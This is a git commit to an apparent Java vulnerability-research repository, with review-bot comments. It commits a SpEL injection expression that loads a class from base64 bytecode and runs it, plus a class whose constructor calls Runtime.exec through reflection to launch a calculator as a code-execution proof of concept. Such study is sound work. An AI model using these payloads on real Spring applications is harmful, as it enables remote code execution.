
Commit 021f6c4

committed
delete error code
1 parent dd3ddab commit 021f6c4


4 files changed

+27
-42
lines changed


SecVulns/Springboot2/src/main/java/com/ppp/springboot/vul/code/AviatorScriptController.java

-33
This file was deleted.

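--- a/SecVulns/VulnCore/Expression/SPELAttack/src/main/java/com/ppp/spel/SPELAttack.java
+++ b/SecVulns/VulnCore/Expression/SPELAttack/src/main/java/com/ppp/spel/SPELAttack.java
@@ -54,12 +54,13 @@ public static void main(String[] args) {
 // System.out.println(obj);
 
 
-// 添加 module 后二次加载 unnamed module 报错调试
-String test1 = "{T(org.springframework.cglib.core.ReflectUtils).defineClass('org.springframework.expression.Test3',T(org.springframework.util.Base64Utils).decodeFromString('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'),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName('org.springframework.expression.ExpressionParser'))}";
-String load = "{T(java.lang.Thread).currentThread().getContextClassLoader().loadClass('org.springframework.expression.Test3').newInstance()}";
+// // 添加 module 后二次加载 unnamed module 报错调试
+// String test1 = "{T(org.springframework.cglib.core.ReflectUtils).defineClass('org.springframework.expression.Test3',T(org.springframework.util.Base64Utils).decodeFromString('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'),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName('org.springframework.expression.ExpressionParser'))}";
+// String load = "{T(java.lang.Thread).currentThread().getContextClassLoader().loadClass('org.springframework.expression.Test3').newInstance()}";
+// eval(test1);
+// eval(load);
 
-eval(test1);
-eval(load);
+eval(classLoad2);
 
 }
 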
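Review bot: The old `test1`/`load` statements and their `eval` calls are only commented out on new lines 57-61 (the first with a doubled `// //`), although the commit title says the code is deleted. Removing those five lines outright and relying on version history keeps `main` readable and avoids confusion about which expression the demo actually evaluates. `classLoad2` is declared outside this hunk, so whether it is always assigned before `eval(classLoad2);` cannot be confirmed from here.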

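--- a/SecVulns/VulnCore/FilesOperations/src/main/java/com/ppp/FileWrite.java
+++ b/SecVulns/VulnCore/FilesOperations/src/main/java/com/ppp/FileWrite.java
@@ -8,9 +8,13 @@
 public class FileWrite {
 
 public static void main(String[] args) throws Exception{
-String path = "/tmp/1.txt";
+// String path = "/tmp/1.txt";
+String name = "123.jsp";
+// name = "123";
+String path = "/tmp/"+ name + ".txt";
+
 String content = "Hello Whoopsunix!";
-FileWrite.write_FileOutputStream_file(path, content);
+FileWrite.write_DataOut(path, content);
 }
 
 /**
@@ -114,4 +118,11 @@ public static void write_Files(String filePath, String context) throws Exception
 public static void write_FileUtils(String filePath, String context) throws Exception {
 org.apache.commons.io.FileUtils.writeStringToFile(new File(filePath), context, "UTF-8");
 }
+
+public static void write_DataOut(String filePath, String context) throws Exception {
+FileOutputStream fileOutputStream = new FileOutputStream(filePath);
+DataOutputStream dataOutputStream = new DataOutputStream(fileOutputStream);
+dataOutputStream.writeUTF(context);
+
+}
 }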
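Review bot: The new `write_DataOut` (second hunk, new lines 122-127) never closes either stream, so the file handle stays open until the objects are garbage-collected. Wrapping the write as `try (DataOutputStream out = new DataOutputStream(new FileOutputStream(filePath))) { out.writeUTF(context); }` releases it on every path. `writeUTF` also prefixes the data with a two-byte length and encodes in modified UTF-8, so the file will not contain the same bytes that `write_FileUtils` writes for the same `context`, and the call throws `UTFDataFormatException` once the encoded string exceeds 65535 bytes. A one-line Javadoc on the method stating that difference would help anyone comparing the helpers.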

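--- a/SecVulns/VulnCore/Serialization/ClassLoad/src/main/java/org/springframework/expression/Test3.java
+++ b/SecVulns/VulnCore/Serialization/ClassLoad/src/main/java/org/springframework/expression/Test3.java
@@ -10,10 +10,16 @@
 */
 public class Test3 {
 public Test3() {
+// Runtime.getRuntime().exec("open -a Calculator.app");
+// 反射调用
 try {
-System.out.println("Exec");
-Runtime.getRuntime().exec("open -a Calculator.app");
+Class cls = Class.forName("java.lang.Runtime");
+Method method = cls.getDeclaredMethod("getRuntime");
+Object obj = method.invoke(null);
+method = cls.getDeclaredMethod("exec", String.class);
+method.invoke(obj, "open -a Calculator.app");
 } catch (Exception e) {
+e.printStackTrace();
 }
 }
 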
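Review bot: The reflective block on new lines 16-20 uses the raw type `Class` and is guarded by `catch (Exception e)`. `Class<?> cls = Class.forName("java.lang.Runtime");` together with `catch (ReflectiveOperationException e)` removes the raw-type warning and names what can actually fail, since every checked exception in the `try` is reflective. The direct call is also kept as a comment on new line 13 beside the reflective version; one of the two is enough. A Javadoc line on the constructor stating that instantiation starts an external process, using a macOS-only command, would make that side effect visible to anyone who loads the class in a test.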
